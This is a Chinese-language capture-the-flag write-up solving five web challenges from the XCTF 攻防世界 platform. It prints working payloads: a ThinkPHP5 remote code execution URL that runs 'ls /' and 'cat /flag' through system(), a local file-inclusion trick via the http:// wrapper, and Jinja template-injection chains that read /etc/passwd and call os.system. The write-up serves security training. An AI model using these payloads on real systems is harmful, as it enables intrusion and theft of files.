攻防世界WEB高手进阶区第一周

Baby_web

[题目描述]想想初始页面是哪个
[题目场景]
攻防世界WEB高手进阶区第一周_第1张图片

								图 1

打开之后的界面为图1,根据题目描述,我们需要找到初始页面。可以看到这个页面的http为http://220.249.52.133:55890/1.php,然后要找到初始页面我们可以把1.php换成index.php。
即这样
在这里插入图片描述
但是 会发现访问之后还是会跳转到http://220.249.52.133:55890/1.php

我们可以Fn+F12得到
在这里插入图片描述

此时再将http://220.249.52.133:55890/1.php改为http://220.249.52.133:55890/index.php进行访问会得到
在这里插入图片描述

我们可以看到出现了
在这里插入图片描述

点击这个文件可以看到
攻防世界WEB高手进阶区第一周_第2张图片

在消息头中下拉则可以看到
攻防世界WEB高手进阶区第一周_第3张图片

Php_rce

[题目描述]暂无
[题目场景]
攻防世界WEB高手进阶区第一周_第4张图片

我们看到的是一个报错的页面,根据页面提示查找一下thinkphp5这个版本有什么漏洞以及如何进行漏洞利用。

可以看到
在这里插入图片描述
即在修复之前程序未对控制器进行过滤,导致攻击者可以通过引入\符号来调用任意类方法。

漏洞利用
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

返回到题中我们用操作系统命令对此进行查找flag文件
http://220.249.52.133:44739/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls /(查找目录)得到
攻防世界WEB高手进阶区第一周_第5张图片

我们可以看到在目录中有flag文件
攻防世界WEB高手进阶区第一周_第6张图片

继续查找目录找flag文件
http://220.249.52.133:44739/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls /flag 得到
攻防世界WEB高手进阶区第一周_第7张图片

查看flag文件中的内容
http://220.249.52.133:44739/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /flag 得到
在这里插入图片描述
Ps:代码执行/命令执行(操作系统命令)/文件写入
攻防世界WEB高手进阶区第一周_第8张图片

Training-WWW-Robots

[题目描述]暂无
[题目场景]
攻防世界WEB高手进阶区第一周_第9张图片
看到这段话的第一反应是点 这个链接,但是无法访问。
然后我们看到了 ,对http://220.249.52.133:51073/robots.txt进行访问

我们可以看到
攻防世界WEB高手进阶区第一周_第10张图片
获得了robots协议

我们可以看到
在这里插入图片描述

直接在上述网址后加上/fl0g.php 即http://220.249.52.133:51073/robots.txt%20/fl0g.php
会报错

那么我们返回到最初的界面 对http://220.249.52.133:51073/fl0g.php进行访问
则可获得
攻防世界WEB高手进阶区第一周_第11张图片

Web_php_include

[题目描述]暂无
[题目场景]
攻防世界WEB高手进阶区第一周_第12张图片
分析代码我们可以知道page中带有php://的都会被替换成空且程序过滤掉了page=参数传入php://
我们可以看到在所给的代码中传入了一个hello,先对它进行测试
令hello=1 我们可以得到
攻防世界WEB高手进阶区第一周_第13张图片
有返回数据

我们可以利用hello这个参数来构造进行查询,首先让page参数用http伪协议访问127.0.0.1时page这个参数为真,构造page=http://127.0.0.1/?hello=

首先查询目录
即page=http://127.0.0.1/?hello=
攻防世界WEB高手进阶区第一周_第14张图片

如图所示一共获得了三个文件 我们对第一个文件进行访问即page=http://127.0.01/?hello=
攻防世界WEB高手进阶区第一周_第15张图片

Web_python_template_injection

[题目描述]暂无
[题目场景]
攻防世界WEB高手进阶区第一周_第16张图片
在url后面添加字符进行测试构造参数{{1*2}}
攻防世界WEB高手进阶区第一周_第17张图片
可以看到页面显示“2”,则应该存在模板注入
攻防世界WEB高手进阶区第一周_第18张图片

  • 获取字符串的类对象 ‘’.__ class __
  • 寻找基类 ‘’.__ class__.__ mro__
  • 寻找可以用引用 ‘’.__ class__.__ mro__[2].__ subclasses__()
  • 构造文件读取
    ‘’.__ class__.__ mro__[2].__ subclasses__()[40] (’/etc/passwd’).read()
  • payload
    eg: ‘’.__ class__.__ mro__[2].__ subclasses__()[71].__ init__.__ globals__[‘os’].system(‘ls’)

第一步:{{’’.__ class__.__ mro__[2].__ subclasses__()}}得到
攻防世界WEB高手进阶区第一周_第19张图片

第二步:{{’’.__ class__.__ mro__[2].__ subclasses__()[71].__ init__.__ globals__[‘os’].listdir(’.’)}}构造payload
攻防世界WEB高手进阶区第一周_第20张图片
第三步:{{’’.__ class__.__ mro__[2].__ subclasses__ () [40] (‘fl4g’).read()}}读取文件
攻防世界WEB高手进阶区第一周_第21张图片

你可能感兴趣的:(攻防世界WEB高手进阶区第一周)